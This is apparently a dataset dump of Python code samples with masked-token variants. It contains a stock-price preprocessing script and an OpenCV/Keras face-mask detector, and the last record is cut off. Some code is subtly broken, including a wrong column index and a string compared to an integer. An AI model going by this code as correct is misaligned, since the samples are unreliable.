index
int64 0
100k
| blob_id
stringlengths 40
40
| code
stringlengths 7
7.27M
| steps
sequencelengths 1
1.25k
| error
bool 2
classes |
---|---|---|---|---|
99,800 | 9e954089adab72a0d6e4434acfaaed67ad11f7e5 | import numpy as np
import utils.data as dt
import params
from sample_06 import x_returns_train
np.random.seed(123)
''' Model management'''
save_model = True
''' Input parameters '''
symbol = 'AAPL'
look_back = 15 #15
look_ahead = 1
train_size = 0.8
randomize_data = False
''' Hyper parameters '''
epochs = 20
validation_split=0.1 # part of the training set
batch_size = 64
alpha = 3.0
''' Loading data '''
df = dt.load_data(params.global_params['db_path'], symbol, index_col='date')
df = df[['open', 'high', 'low', 'close']]
''' Preparing data - Inline data as input parameters '''
data = df.values
train_rows = int(data.shape[0]*train_size)
train_data = data[:train_rows]
test_data = data[train_rows:]
test_dates = df.index.values[train_rows+look_back:]
x_close_train, y_train = dt.normalize(train_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)
x_close_test, y_test = dt.normalize(test_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)
x_open_train, _ = dt.normalize(train_data[:, 0], ref_data=train_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)
x_open_test, _ = dt.normalize(test_data[:, 0], ref_data=test_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)
x_high_train, _ = dt.normalize(train_data[:, 1], ref_data=train_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)
x_high_test, _ = dt.normalize(test_data[:, 1], ref_data=test_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)
x_low_train, _ = dt.normalize(train_data[:, 2], ref_data=train_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)
x_low_test, _ = dt.normalize(test_data[:, 2], ref_data=test_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)
x_returns_train = dt.stack(train_data[:, 5], look_back=look_back, look_ahead=look_ahead)
x_returns_test = dt.stack(test_data[:, 5], look_back=look_back, look_ahead=look_ahead)
''' Randomize train data '''
if(randomize_data):
shuffled = list(np.random.permutation(x_close_train.shape[0]))
x_close_train = x_close_train[shuffled]
x_open_train = x_open_train[shuffled]
x_high_train = x_high_train[shuffled]
y_train = y_train[shuffled]
''' Reshape data for model '''
x_close_train = np.reshape(x_close_train, (x_close_train.shape[0], x_close_train.shape[1]))
x_close_test = np.reshape(x_close_test, (x_close_test.shape[0], x_close_test.shape[1]))
x_open_train = np.reshape(x_open_train, (x_open_train.shape[0], x_open_train.shape[1]))
x_open_test = np.reshape(x_open_test, (x_open_test.shape[0], x_open_test.shape[1]))
x_high_train = np.reshape(x_high_train, (x_high_train.shape[0], x_high_train.shape[1]))
x_high_test = np.reshape(x_high_test, (x_high_test.shape[0], x_high_test.shape[1]))
x_low_train = np.reshape(x_low_train, (x_low_train.shape[0], x_low_train.shape[1]))
x_low_test = np.reshape(x_low_test, (x_low_test.shape[0], x_low_test.shape[1]))
x_returns_train = np.reshape(x_returns_train, (x_returns_train.shape[0], x_returns_train.shape[1]))
x_returns_test = np.reshape(x_returns_test, (x_returns_test.shape[0], x_returns_test.shape[1]))
x_train = np.hstack((x_open_train, x_high_train, x_low_train))
x_test = np.hstack((x_open_test, x_high_test, x_low_test))
# x_train = np.hstack((x_close_train))
# x_test = np.hstack((x_close_test))
x_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[1], 1))
x_test = np.reshape(x_test, (x_test.shape[0], x_test.shape[1], 1))
y_train = np.reshape(y_train, (y_train.shape[0], 1))
y_test = np.reshape(y_test, (y_test.shape[0], 1))
print('x_train.shape', x_train.shape)
print('x_test.shape', x_test.shape)
| [
"import numpy as np\nimport utils.data as dt\nimport params\nfrom sample_06 import x_returns_train\n\nnp.random.seed(123)\n''' Model management'''\nsave_model = True\n\n''' Input parameters '''\nsymbol = 'AAPL'\nlook_back = 15 #15\nlook_ahead = 1\ntrain_size = 0.8\nrandomize_data = False\n\n''' Hyper parameters '''\nepochs = 20\nvalidation_split=0.1 # part of the training set\nbatch_size = 64\nalpha = 3.0\n\n''' Loading data '''\ndf = dt.load_data(params.global_params['db_path'], symbol, index_col='date')\ndf = df[['open', 'high', 'low', 'close']]\n\n''' Preparing data - Inline data as input parameters '''\n\ndata = df.values\ntrain_rows = int(data.shape[0]*train_size)\n\ntrain_data = data[:train_rows]\ntest_data = data[train_rows:]\ntest_dates = df.index.values[train_rows+look_back:]\n\nx_close_train, y_train = dt.normalize(train_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_close_test, y_test = dt.normalize(test_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)\n\nx_open_train, _ = dt.normalize(train_data[:, 0], ref_data=train_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_open_test, _ = dt.normalize(test_data[:, 0], ref_data=test_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)\n\nx_high_train, _ = dt.normalize(train_data[:, 1], ref_data=train_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_high_test, _ = dt.normalize(test_data[:, 1], ref_data=test_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)\n\nx_low_train, _ = dt.normalize(train_data[:, 2], ref_data=train_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_low_test, _ = dt.normalize(test_data[:, 2], ref_data=test_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)\n\nx_returns_train = dt.stack(train_data[:, 5], look_back=look_back, look_ahead=look_ahead)\nx_returns_test = dt.stack(test_data[:, 5], look_back=look_back, look_ahead=look_ahead)\n\n''' Randomize train data '''\nif(randomize_data):\n shuffled = list(np.random.permutation(x_close_train.shape[0]))\n x_close_train = x_close_train[shuffled]\n x_open_train = x_open_train[shuffled]\n x_high_train = x_high_train[shuffled]\n y_train = y_train[shuffled]\n\n''' Reshape data for model '''\nx_close_train = np.reshape(x_close_train, (x_close_train.shape[0], x_close_train.shape[1]))\nx_close_test = np.reshape(x_close_test, (x_close_test.shape[0], x_close_test.shape[1]))\n\nx_open_train = np.reshape(x_open_train, (x_open_train.shape[0], x_open_train.shape[1]))\nx_open_test = np.reshape(x_open_test, (x_open_test.shape[0], x_open_test.shape[1]))\n\nx_high_train = np.reshape(x_high_train, (x_high_train.shape[0], x_high_train.shape[1]))\nx_high_test = np.reshape(x_high_test, (x_high_test.shape[0], x_high_test.shape[1]))\n\nx_low_train = np.reshape(x_low_train, (x_low_train.shape[0], x_low_train.shape[1]))\nx_low_test = np.reshape(x_low_test, (x_low_test.shape[0], x_low_test.shape[1]))\n\nx_returns_train = np.reshape(x_returns_train, (x_returns_train.shape[0], x_returns_train.shape[1]))\nx_returns_test = np.reshape(x_returns_test, (x_returns_test.shape[0], x_returns_test.shape[1]))\n\nx_train = np.hstack((x_open_train, x_high_train, x_low_train))\nx_test = np.hstack((x_open_test, x_high_test, x_low_test))\n\n# x_train = np.hstack((x_close_train))\n# x_test = np.hstack((x_close_test))\nx_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[1], 1))\nx_test = np.reshape(x_test, (x_test.shape[0], x_test.shape[1], 1))\n\ny_train = np.reshape(y_train, (y_train.shape[0], 1))\ny_test = np.reshape(y_test, (y_test.shape[0], 1))\nprint('x_train.shape', x_train.shape)\nprint('x_test.shape', x_test.shape)\n",
"import numpy as np\nimport utils.data as dt\nimport params\nfrom sample_06 import x_returns_train\nnp.random.seed(123)\n<docstring token>\nsave_model = True\n<docstring token>\nsymbol = 'AAPL'\nlook_back = 15\nlook_ahead = 1\ntrain_size = 0.8\nrandomize_data = False\n<docstring token>\nepochs = 20\nvalidation_split = 0.1\nbatch_size = 64\nalpha = 3.0\n<docstring token>\ndf = dt.load_data(params.global_params['db_path'], symbol, index_col='date')\ndf = df[['open', 'high', 'low', 'close']]\n<docstring token>\ndata = df.values\ntrain_rows = int(data.shape[0] * train_size)\ntrain_data = data[:train_rows]\ntest_data = data[train_rows:]\ntest_dates = df.index.values[train_rows + look_back:]\nx_close_train, y_train = dt.normalize(train_data[:, 3], look_back=look_back,\n look_ahead=look_ahead, alpha=alpha)\nx_close_test, y_test = dt.normalize(test_data[:, 3], look_back=look_back,\n look_ahead=look_ahead, alpha=alpha)\nx_open_train, _ = dt.normalize(train_data[:, 0], ref_data=train_data[:, 3],\n look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_open_test, _ = dt.normalize(test_data[:, 0], ref_data=test_data[:, 3],\n look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_high_train, _ = dt.normalize(train_data[:, 1], ref_data=train_data[:, 3],\n look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_high_test, _ = dt.normalize(test_data[:, 1], ref_data=test_data[:, 3],\n look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_low_train, _ = dt.normalize(train_data[:, 2], ref_data=train_data[:, 3],\n look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_low_test, _ = dt.normalize(test_data[:, 2], ref_data=test_data[:, 3],\n look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_returns_train = dt.stack(train_data[:, 5], look_back=look_back,\n look_ahead=look_ahead)\nx_returns_test = dt.stack(test_data[:, 5], look_back=look_back, look_ahead=\n look_ahead)\n<docstring token>\nif randomize_data:\n shuffled = list(np.random.permutation(x_close_train.shape[0]))\n x_close_train = x_close_train[shuffled]\n x_open_train = x_open_train[shuffled]\n x_high_train = x_high_train[shuffled]\n y_train = y_train[shuffled]\n<docstring token>\nx_close_train = np.reshape(x_close_train, (x_close_train.shape[0],\n x_close_train.shape[1]))\nx_close_test = np.reshape(x_close_test, (x_close_test.shape[0],\n x_close_test.shape[1]))\nx_open_train = np.reshape(x_open_train, (x_open_train.shape[0],\n x_open_train.shape[1]))\nx_open_test = np.reshape(x_open_test, (x_open_test.shape[0], x_open_test.\n shape[1]))\nx_high_train = np.reshape(x_high_train, (x_high_train.shape[0],\n x_high_train.shape[1]))\nx_high_test = np.reshape(x_high_test, (x_high_test.shape[0], x_high_test.\n shape[1]))\nx_low_train = np.reshape(x_low_train, (x_low_train.shape[0], x_low_train.\n shape[1]))\nx_low_test = np.reshape(x_low_test, (x_low_test.shape[0], x_low_test.shape[1]))\nx_returns_train = np.reshape(x_returns_train, (x_returns_train.shape[0],\n x_returns_train.shape[1]))\nx_returns_test = np.reshape(x_returns_test, (x_returns_test.shape[0],\n x_returns_test.shape[1]))\nx_train = np.hstack((x_open_train, x_high_train, x_low_train))\nx_test = np.hstack((x_open_test, x_high_test, x_low_test))\nx_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[1], 1))\nx_test = np.reshape(x_test, (x_test.shape[0], x_test.shape[1], 1))\ny_train = np.reshape(y_train, (y_train.shape[0], 1))\ny_test = np.reshape(y_test, (y_test.shape[0], 1))\nprint('x_train.shape', x_train.shape)\nprint('x_test.shape', x_test.shape)\n",
"<import token>\nnp.random.seed(123)\n<docstring token>\nsave_model = True\n<docstring token>\nsymbol = 'AAPL'\nlook_back = 15\nlook_ahead = 1\ntrain_size = 0.8\nrandomize_data = False\n<docstring token>\nepochs = 20\nvalidation_split = 0.1\nbatch_size = 64\nalpha = 3.0\n<docstring token>\ndf = dt.load_data(params.global_params['db_path'], symbol, index_col='date')\ndf = df[['open', 'high', 'low', 'close']]\n<docstring token>\ndata = df.values\ntrain_rows = int(data.shape[0] * train_size)\ntrain_data = data[:train_rows]\ntest_data = data[train_rows:]\ntest_dates = df.index.values[train_rows + look_back:]\nx_close_train, y_train = dt.normalize(train_data[:, 3], look_back=look_back,\n look_ahead=look_ahead, alpha=alpha)\nx_close_test, y_test = dt.normalize(test_data[:, 3], look_back=look_back,\n look_ahead=look_ahead, alpha=alpha)\nx_open_train, _ = dt.normalize(train_data[:, 0], ref_data=train_data[:, 3],\n look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_open_test, _ = dt.normalize(test_data[:, 0], ref_data=test_data[:, 3],\n look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_high_train, _ = dt.normalize(train_data[:, 1], ref_data=train_data[:, 3],\n look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_high_test, _ = dt.normalize(test_data[:, 1], ref_data=test_data[:, 3],\n look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_low_train, _ = dt.normalize(train_data[:, 2], ref_data=train_data[:, 3],\n look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_low_test, _ = dt.normalize(test_data[:, 2], ref_data=test_data[:, 3],\n look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_returns_train = dt.stack(train_data[:, 5], look_back=look_back,\n look_ahead=look_ahead)\nx_returns_test = dt.stack(test_data[:, 5], look_back=look_back, look_ahead=\n look_ahead)\n<docstring token>\nif randomize_data:\n shuffled = list(np.random.permutation(x_close_train.shape[0]))\n x_close_train = x_close_train[shuffled]\n x_open_train = x_open_train[shuffled]\n x_high_train = x_high_train[shuffled]\n y_train = y_train[shuffled]\n<docstring token>\nx_close_train = np.reshape(x_close_train, (x_close_train.shape[0],\n x_close_train.shape[1]))\nx_close_test = np.reshape(x_close_test, (x_close_test.shape[0],\n x_close_test.shape[1]))\nx_open_train = np.reshape(x_open_train, (x_open_train.shape[0],\n x_open_train.shape[1]))\nx_open_test = np.reshape(x_open_test, (x_open_test.shape[0], x_open_test.\n shape[1]))\nx_high_train = np.reshape(x_high_train, (x_high_train.shape[0],\n x_high_train.shape[1]))\nx_high_test = np.reshape(x_high_test, (x_high_test.shape[0], x_high_test.\n shape[1]))\nx_low_train = np.reshape(x_low_train, (x_low_train.shape[0], x_low_train.\n shape[1]))\nx_low_test = np.reshape(x_low_test, (x_low_test.shape[0], x_low_test.shape[1]))\nx_returns_train = np.reshape(x_returns_train, (x_returns_train.shape[0],\n x_returns_train.shape[1]))\nx_returns_test = np.reshape(x_returns_test, (x_returns_test.shape[0],\n x_returns_test.shape[1]))\nx_train = np.hstack((x_open_train, x_high_train, x_low_train))\nx_test = np.hstack((x_open_test, x_high_test, x_low_test))\nx_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[1], 1))\nx_test = np.reshape(x_test, (x_test.shape[0], x_test.shape[1], 1))\ny_train = np.reshape(y_train, (y_train.shape[0], 1))\ny_test = np.reshape(y_test, (y_test.shape[0], 1))\nprint('x_train.shape', x_train.shape)\nprint('x_test.shape', x_test.shape)\n",
"<import token>\nnp.random.seed(123)\n<docstring token>\n<assignment token>\n<docstring token>\n<assignment token>\n<docstring token>\n<assignment token>\n<docstring token>\n<assignment token>\n<docstring token>\n<assignment token>\n<docstring token>\nif randomize_data:\n shuffled = list(np.random.permutation(x_close_train.shape[0]))\n x_close_train = x_close_train[shuffled]\n x_open_train = x_open_train[shuffled]\n x_high_train = x_high_train[shuffled]\n y_train = y_train[shuffled]\n<docstring token>\n<assignment token>\nprint('x_train.shape', x_train.shape)\nprint('x_test.shape', x_test.shape)\n",
"<import token>\n<code token>\n<docstring token>\n<assignment token>\n<docstring token>\n<assignment token>\n<docstring token>\n<assignment token>\n<docstring token>\n<assignment token>\n<docstring token>\n<assignment token>\n<docstring token>\n<code token>\n<docstring token>\n<assignment token>\n<code token>\n"
] | false |
99,801 | a57eafb42d73717c90056116e3d0bf705b4a5722 | import os
import shutil
import cv2
from keras.models import load_model
import numpy as np
from keras.preprocessing.image import load_img, img_to_array
# load model # Accuracy=99.3 , validation Accuracy = 99.3 # heavy model, size =226MB
model = load_model('trainedmodel.h5')
print(" Enter a option ")
print(" 1. Detect Mask using image")
print(" 2. Detect Mask using live video")
a=input("Press 1 / 2 : ")
if a==2:
# model accept below hight and width of the image
img_width, img_hight = 224, 224
direc="faces"
a=0o777
# model accept below hight and width of the image
img_width, img_hight = 200, 200
# ......................................
# Load the Cascade face Classifier
face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + "haarcascade_frontalface_default.xml")
# startt web cam
cap = cv2.VideoCapture(0) # for webcam
# cap = cv2.VideoCapture('videos/Mask - 34775.mp4') # for video
img_count_full = 0
# parameters for text
# font
font = cv2.FONT_HERSHEY_SIMPLEX
# org
org = (1, 1)
class_lable = ' '
# fontScale
fontScale = 1 # 0.5
# Blue color in BGR
color = (255, 0, 0)
# Line thickness of 2 px
thickness = 2 # 1
# sart reading images and prediction
while True:
os.mkdir(direc,a)
img_count_full += 1
# read image from webcam
responce, color_img = cap.read()
# color_img = cv2.imread('sandeep.jpg')
# if respoce False the break the loop
if responce == False:
break
# Convert to grayscale
gray_img = cv2.cvtColor(color_img, cv2.COLOR_BGR2GRAY)
# Detect the faces
faces = face_cascade.detectMultiScale(gray_img, 1.2, 3) # 1.1, 3) for 1.mp4
# take face then predict class mask or not mask then draw recrangle and text then display image
img_count = 0
for (x, y, w, h) in faces:
org = (x - 10, y - 10)
img_count += 1
color_face = color_img[y:y + h, x:x + w] # color face
cv2.imwrite('faces/%d%dface.jpg' % (img_count_full, img_count), color_face)
img = load_img('faces/%d%dface.jpg' % (img_count_full, img_count), target_size=(img_width, img_hight))
img = img_to_array(img) / 255
img = np.expand_dims(img, axis=0)
pred_prob = model.predict(img)
# print(pred_prob[0][0].round(2))
pred = np.argmax(pred_prob)
if pred == 0:
print("User with mask - predic = ", pred_prob[0][0])
class_lable = "Mask"
color = (0, 255, 0)
else:
print('user not wearing mask - prob = ', pred_prob[0][1])
class_lable = "No Mask"
color = (0,0, 255)
cv2.rectangle(color_img, (x, y), (x + w, y + h), color, 3)
# Using cv2.putText() method
cv2.putText(color_img, class_lable, org, font,
fontScale, color, thickness, cv2.LINE_AA)
# display image
cv2.imshow('LIVE face mask detection', color_img)
shutil.rmtree(direc)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# Release the VideoCapture object
cap.release()
cv2.destroyAllWindows()
else :
# model accept below hight and width of the image
img_width = 200
img_hight = 200
# Load the Cascade face Classifier
face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')
# parameters for text
# font
font = cv2.FONT_HERSHEY_SIMPLEX
# org
org = (1, 1)
class_lable = ' '
# fontScale
fontScale = 1 # 0.5
# Blue color in BGR
color = (255, 0, 0)
# Line thickness of 2 px
thickness = 2 # 1
# read image from webcam
color_img = cv2.imread('B612_20170324_142650.jpg')
# Convert to grayscale
gray_img = cv2.cvtColor(color_img, cv2.COLOR_BGR2GRAY)
# Detect the faces
faces = face_cascade.detectMultiScale(gray_img,
scaleFactor=1.2,
minNeighbors=5,
flags=cv2.CASCADE_SCALE_IMAGE)
# take face then predict class mask or not mask then draw recrangle and text then display image
img_count = 0
for (x, y, w, h) in faces:
org = (x - 10, y - 10)
img_count += 1
color_face = color_img[y:y + h, x:x + w] # color face
cv2.imwrite('imgfaces/%dface.jpg' % (img_count), color_face)
img = load_img('imgfaces/%dface.jpg' % (img_count), target_size=(img_width, img_hight))
img = img_to_array(img) / 255
img = np.expand_dims(img, axis=0)
pred_prob = model.predict(img)
# print(pred_prob[0][0].round(2))
pred = np.argmax(pred_prob)
if pred == 0:
print("User with mask - predic = ", pred_prob[0][0])
class_lable = "Mask"
color = (255, 0, 0)
cv2.imwrite('faces/with_mask/%dface.jpg' % (img_count), color_face)
cv2.rectangle(color_img, (x, y), (x + w, y + h), (0, 0, 255), 3)
# Using cv2.putText() method
cv2.putText(color_img, class_lable, org, font,
fontScale, color, thickness, cv2.LINE_AA)
cv2.imwrite('faces/with_mask/%dmask.jpg' % (img_count), color_img)
else:
print('user not wearing mask - prob = ', pred_prob[0][1])
class_lable = "No Mask"
color = (0, 255, 0)
cv2.rectangle(color_img, (x, y), (x + w, y + h), (0, 0, 255), 3)
# Using cv2.putText() method
cv2.putText(color_img, class_lable, org, font,
fontScale, color, thickness, cv2.LINE_AA)
cv2.imwrite('faces/with_mask/%dno_mask.jpg' % (img_count), color_img)
# display image
dim = (600, 600)
resized = cv2.resize(color_img, dim, interpolation=cv2.INTER_AREA)
cv2.imshow('LIVE face mask detection', resized)
cv2.waitKey()
# close all windows
cv2.destroyAllWindows()
input('Press ENTER to exit')
| [
"import os\nimport shutil\nimport cv2\nfrom keras.models import load_model\nimport numpy as np\nfrom keras.preprocessing.image import load_img, img_to_array\n\n# load model # Accuracy=99.3 , validation Accuracy = 99.3 # heavy model, size =226MB\nmodel = load_model('trainedmodel.h5')\n\nprint(\" Enter a option \")\nprint(\" 1. Detect Mask using image\")\nprint(\" 2. Detect Mask using live video\")\na=input(\"Press 1 / 2 : \")\nif a==2:\n # model accept below hight and width of the image\n img_width, img_hight = 224, 224\n direc=\"faces\"\n a=0o777\n # model accept below hight and width of the image\n img_width, img_hight = 200, 200\n\n # ......................................\n # Load the Cascade face Classifier\n face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + \"haarcascade_frontalface_default.xml\")\n\n # startt web cam\n cap = cv2.VideoCapture(0) # for webcam\n # cap = cv2.VideoCapture('videos/Mask - 34775.mp4') # for video\n\n img_count_full = 0\n\n # parameters for text\n # font\n font = cv2.FONT_HERSHEY_SIMPLEX\n # org\n org = (1, 1)\n class_lable = ' '\n # fontScale\n fontScale = 1 # 0.5\n # Blue color in BGR\n color = (255, 0, 0)\n # Line thickness of 2 px\n thickness = 2 # 1\n\n # sart reading images and prediction\n while True:\n os.mkdir(direc,a)\n img_count_full += 1\n\n # read image from webcam\n responce, color_img = cap.read()\n # color_img = cv2.imread('sandeep.jpg')\n\n # if respoce False the break the loop\n if responce == False:\n break\n\n # Convert to grayscale\n gray_img = cv2.cvtColor(color_img, cv2.COLOR_BGR2GRAY)\n\n # Detect the faces\n faces = face_cascade.detectMultiScale(gray_img, 1.2, 3) # 1.1, 3) for 1.mp4\n\n # take face then predict class mask or not mask then draw recrangle and text then display image\n img_count = 0\n for (x, y, w, h) in faces:\n org = (x - 10, y - 10)\n img_count += 1\n color_face = color_img[y:y + h, x:x + w] # color face\n cv2.imwrite('faces/%d%dface.jpg' % (img_count_full, img_count), color_face)\n img = load_img('faces/%d%dface.jpg' % (img_count_full, img_count), target_size=(img_width, img_hight))\n\n img = img_to_array(img) / 255\n img = np.expand_dims(img, axis=0)\n pred_prob = model.predict(img)\n # print(pred_prob[0][0].round(2))\n pred = np.argmax(pred_prob)\n\n if pred == 0:\n print(\"User with mask - predic = \", pred_prob[0][0])\n class_lable = \"Mask\"\n color = (0, 255, 0)\n\n else:\n print('user not wearing mask - prob = ', pred_prob[0][1])\n class_lable = \"No Mask\"\n color = (0,0, 255)\n\n cv2.rectangle(color_img, (x, y), (x + w, y + h), color, 3)\n # Using cv2.putText() method\n cv2.putText(color_img, class_lable, org, font,\n fontScale, color, thickness, cv2.LINE_AA)\n\n # display image\n cv2.imshow('LIVE face mask detection', color_img)\n shutil.rmtree(direc)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n\n break\n\n\n # Release the VideoCapture object\n cap.release()\n cv2.destroyAllWindows()\nelse :\n # model accept below hight and width of the image\n img_width = 200\n img_hight = 200\n # Load the Cascade face Classifier\n face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')\n\n # parameters for text\n # font\n font = cv2.FONT_HERSHEY_SIMPLEX\n # org\n org = (1, 1)\n class_lable = ' '\n # fontScale\n fontScale = 1 # 0.5\n # Blue color in BGR\n color = (255, 0, 0)\n # Line thickness of 2 px\n thickness = 2 # 1\n\n # read image from webcam\n color_img = cv2.imread('B612_20170324_142650.jpg')\n\n # Convert to grayscale\n gray_img = cv2.cvtColor(color_img, cv2.COLOR_BGR2GRAY)\n\n # Detect the faces\n faces = face_cascade.detectMultiScale(gray_img,\n scaleFactor=1.2,\n minNeighbors=5,\n flags=cv2.CASCADE_SCALE_IMAGE)\n\n # take face then predict class mask or not mask then draw recrangle and text then display image\n img_count = 0\n for (x, y, w, h) in faces:\n org = (x - 10, y - 10)\n img_count += 1\n color_face = color_img[y:y + h, x:x + w] # color face\n cv2.imwrite('imgfaces/%dface.jpg' % (img_count), color_face)\n img = load_img('imgfaces/%dface.jpg' % (img_count), target_size=(img_width, img_hight))\n\n img = img_to_array(img) / 255\n img = np.expand_dims(img, axis=0)\n pred_prob = model.predict(img)\n # print(pred_prob[0][0].round(2))\n pred = np.argmax(pred_prob)\n\n if pred == 0:\n print(\"User with mask - predic = \", pred_prob[0][0])\n class_lable = \"Mask\"\n color = (255, 0, 0)\n cv2.imwrite('faces/with_mask/%dface.jpg' % (img_count), color_face)\n cv2.rectangle(color_img, (x, y), (x + w, y + h), (0, 0, 255), 3)\n # Using cv2.putText() method\n cv2.putText(color_img, class_lable, org, font,\n fontScale, color, thickness, cv2.LINE_AA)\n cv2.imwrite('faces/with_mask/%dmask.jpg' % (img_count), color_img)\n\n else:\n print('user not wearing mask - prob = ', pred_prob[0][1])\n class_lable = \"No Mask\"\n color = (0, 255, 0)\n cv2.rectangle(color_img, (x, y), (x + w, y + h), (0, 0, 255), 3)\n # Using cv2.putText() method\n cv2.putText(color_img, class_lable, org, font,\n fontScale, color, thickness, cv2.LINE_AA)\n cv2.imwrite('faces/with_mask/%dno_mask.jpg' % (img_count), color_img)\n\n # display image\n dim = (600, 600)\n resized = cv2.resize(color_img, dim, interpolation=cv2.INTER_AREA)\n cv2.imshow('LIVE face mask detection', resized)\n\n cv2.waitKey()\n\n # close all windows\n cv2.destroyAllWindows()\n\ninput('Press ENTER to exit')\n",
"import os\nimport shutil\nimport cv2\nfrom keras.models import load_model\nimport numpy as np\nfrom keras.preprocessing.image import load_img, img_to_array\nmodel = load_model('trainedmodel.h5')\nprint(' Enter a option ')\nprint(' 1. Detect Mask using image')\nprint(' 2. Detect Mask using live video')\na = input('Press 1 / 2 : ')\nif a == 2:\n img_width, img_hight = 224, 224\n direc = 'faces'\n a = 511\n img_width, img_hight = 200, 200\n face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades +\n 'haarcascade_frontalface_default.xml')\n cap = cv2.VideoCapture(0)\n img_count_full = 0\n font = cv2.FONT_HERSHEY_SIMPLEX\n org = 1, 1\n class_lable = ' '\n fontScale = 1\n color = 255, 0, 0\n thickness = 2\n while True:\n os.mkdir(direc, a)\n img_count_full += 1\n responce, color_img = cap.read()\n if responce == False:\n break\n gray_img = cv2.cvtColor(color_img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray_img, 1.2, 3)\n img_count = 0\n for x, y, w, h in faces:\n org = x - 10, y - 10\n img_count += 1\n color_face = color_img[y:y + h, x:x + w]\n cv2.imwrite('faces/%d%dface.jpg' % (img_count_full, img_count),\n color_face)\n img = load_img('faces/%d%dface.jpg' % (img_count_full,\n img_count), target_size=(img_width, img_hight))\n img = img_to_array(img) / 255\n img = np.expand_dims(img, axis=0)\n pred_prob = model.predict(img)\n pred = np.argmax(pred_prob)\n if pred == 0:\n print('User with mask - predic = ', pred_prob[0][0])\n class_lable = 'Mask'\n color = 0, 255, 0\n else:\n print('user not wearing mask - prob = ', pred_prob[0][1])\n class_lable = 'No Mask'\n color = 0, 0, 255\n cv2.rectangle(color_img, (x, y), (x + w, y + h), color, 3)\n cv2.putText(color_img, class_lable, org, font, fontScale, color,\n thickness, cv2.LINE_AA)\n cv2.imshow('LIVE face mask detection', color_img)\n shutil.rmtree(direc)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\n cap.release()\n cv2.destroyAllWindows()\nelse:\n img_width = 200\n img_hight = 200\n face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades +\n 'haarcascade_frontalface_default.xml')\n font = cv2.FONT_HERSHEY_SIMPLEX\n org = 1, 1\n class_lable = ' '\n fontScale = 1\n color = 255, 0, 0\n thickness = 2\n color_img = cv2.imread('B612_20170324_142650.jpg')\n gray_img = cv2.cvtColor(color_img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray_img, scaleFactor=1.2,\n minNeighbors=5, flags=cv2.CASCADE_SCALE_IMAGE)\n img_count = 0\n for x, y, w, h in faces:\n org = x - 10, y - 10\n img_count += 1\n color_face = color_img[y:y + h, x:x + w]\n cv2.imwrite('imgfaces/%dface.jpg' % img_count, color_face)\n img = load_img('imgfaces/%dface.jpg' % img_count, target_size=(\n img_width, img_hight))\n img = img_to_array(img) / 255\n img = np.expand_dims(img, axis=0)\n pred_prob = model.predict(img)\n pred = np.argmax(pred_prob)\n if pred == 0:\n print('User with mask - predic = ', pred_prob[0][0])\n class_lable = 'Mask'\n color = 255, 0, 0\n cv2.imwrite('faces/with_mask/%dface.jpg' % img_count, color_face)\n cv2.rectangle(color_img, (x, y), (x + w, y + h), (0, 0, 255), 3)\n cv2.putText(color_img, class_lable, org, font, fontScale, color,\n thickness, cv2.LINE_AA)\n cv2.imwrite('faces/with_mask/%dmask.jpg' % img_count, color_img)\n else:\n print('user not wearing mask - prob = ', pred_prob[0][1])\n class_lable = 'No Mask'\n color = 0, 255, 0\n cv2.rectangle(color_img, (x, y), (x + w, y + h), (0, 0, 255), 3)\n cv2.putText(color_img, class_lable, org, font, fontScale, color,\n thickness, cv2.LINE_AA)\n cv2.imwrite('faces/with_mask/%dno_mask.jpg' % img_count, color_img)\n dim = 600, 600\n resized = cv2.resize(color_img, dim, interpolation=cv2.INTER_AREA)\n cv2.imshow('LIVE face mask detection', resized)\n cv2.waitKey()\n cv2.destroyAllWindows()\ninput('Press ENTER to exit')\n",
